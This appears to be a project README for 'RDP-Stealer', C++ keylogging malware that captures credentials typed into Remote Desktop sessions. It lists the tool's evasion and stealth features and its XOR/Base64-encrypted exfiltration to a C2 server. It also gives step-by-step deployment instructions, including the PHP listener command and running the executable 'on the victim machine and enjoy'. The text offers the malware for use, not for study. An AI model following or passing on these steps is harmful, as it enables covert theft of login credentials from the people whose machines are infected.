RDP-Stealer is C++ malware that targets Remote Desktop Protocol (RDP) processes. It acts as a keystroke logger, capturing credentials provided by users in RDP and sending back encrypted data to a C2 server.
- Basic Sandbox Evasion
- Executes without a visible window (in the background).
- Captures keystrokes in RDP processes using the context of
mstsc.exeandCredentialUIBroker.exe. - Encrypts the captured data using
XORandBASE64. - Sends data to a C2 server.
- Create a recvData folder in the directory.
- Change
SECRET_KEYfromRDPStealer.cppandserver.php. - Before running the
RDPStealer.exeon the victim machine, first run theserver.php.
php -S 0.0.0.0:8000- Run the
RDPStealer.exeon the victim machine and enjoy :).
.\RDPStealer.exeNote
⚠️
- It is better to use an
HTTPS serverinstead of anHTTP server. - The program will execute in the background and will not display any windows, as it is shown in the video below.